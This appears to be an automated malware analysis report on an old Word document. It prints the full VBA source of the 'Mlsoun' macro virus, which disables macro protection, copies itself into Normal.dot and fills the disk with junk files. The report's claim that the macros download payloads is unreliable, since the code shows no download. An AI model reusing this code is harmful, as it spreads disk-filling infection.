Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ea7f86e2ad9312d1…

MALICIOUS

Office (OLE)

32.0 KB Created: 1997-01-30 14:55:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f89c2517d32d5d53cd7642fc95d078c4 SHA-1: 7ba4dc3c8e2d2021cb489d23eb47e8a5bcc217c3 SHA-256: ea7f86e2ad9312d16cde4794ec3795d8dcaee2acf9808601d6968c18188d7148
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including AutoOpen and AutoClose functions, indicating malicious intent. The Autoexec macro attempts to write to a file named 'count.dll' and then create sequentially numbered '.dll' files (e.g., 'off1.dll') in the application's path, likely to download and execute secondary payloads. The presence of legacy WordBasic markers further supports its malicious nature.

Heuristics 4

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3699 bytes
SHA-256: 27b06f1c467bf9d1ca581e7ffa24887f417bf1ebbfd2e381bf50cb1f38db7204
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Mlsoun1"
Sub Autoexec()
'jsem&ml$oun2
'for template
Dim pocitadlo As Integer
On Error GoTo errs
    Options.VirusProtection = False
    ChDir (Application.Path)
    filecount = CurDir + "\count.dll"
    Open filecount For Binary As #1
    Get #1, 1, pocitadlo
    pocitadlo = pocitadlo + 1
    Put #1, 1, pocitadlo
    Close #1
    soubor = Application.Path & "\" & "off" & pocitadlo & ".dll"
    Open soubor For Output As #2
    retezec = "Jsem Mlsoun1, a mam rad Vas harddisk, radeji si poridte velmi maly, at mne lepe najdete!"
    Do While Not delk = 30000
        Print #2, retezec
        delk = delk + 1
    Loop
    Close #2
Exit Sub
errs:
    Select Case Err.Number
        Case 61
            c = MsgBox("Nedostatek mista na disku!Toto zpusobil virus MLSOUN!", vbExclamation)
        Case Else
    End Select
End Sub
Sub AutoClose()
'from template to file
On Error GoTo errs
    docu = Application.ActiveDocument.Name
    If dok = "Normal.dot" Then Exit Sub
    docupath = Application.ActiveDocument.Path + "\" + docu
    templname = Application.NormalTemplate.Name
    templpath = Application.NormalTemplate.Path + "\" + templname
    Application.OrganizerCopy Source:= _
    templpath, Destination:= _
    docupath, Name:="Mlsoun1", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:= _
    templpath, Destination:= _
    docupath, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
errs:
    Select Case Err.Number
        Case 5940
        Case 4248
        Case 4198
        Case 4149
        Case 0
        Case Else
    End Select
End Sub
Sub AutoExit()
'from template to file
On Error GoTo errs
    'Application.ActiveDocument.Save
    docu = Application.ActiveDocument.Name
    If dok = "Normal.dot" Then Exit Sub
    docupath = Application.ActiveDocument.Path + "\" + docu
    templname = Application.NormalTemplate.Name
    templpath = Application.NormalTemplate.Path + "\" + templname
    Application.OrganizerCopy Source:= _
    templpath, Destination:= _
    docupath, Name:="Mlsoun1", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:= _
    templpath, Destination:= _
    docupath, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
errs:
    Select Case Err.Number
        Case 5940
        Case 4248
        Case 4198
        Case 4149
        Case 0
        Case Else
    End Select
End Sub

Attribute VB_Name = "AutoOpen"
Sub MAIN()
'jsem&ml$oun2
'from file to template
On Error GoTo errs
    Options.VirusProtection = False
    docu = Application.ActiveDocument.Name
    docupath = Application.ActiveDocument.Path + "\" + docu
    ChDir (Application.NormalTemplate.Path)
    activedir = CurDir + "\Normal.dot"
    Application.OrganizerCopy Source:= _
    docupath, Destination:= _
    activedir, Name:="Mlsoun1", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:= _
    docupath, Destination:= _
    activedir, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
    Exit Sub
errs:
    Select Case Err.Number
        Case 5940   'polozku projektu nelze zkopirovat
        Case 61
            c = MsgBox("Na disku není dostatek místa. Uvolnìte místo smazáním nìkolika souborù!", vbExclamation + vbOKOnly)
        Application.ActiveWindow.Close (False)
        Case Else
    End Select
End Sub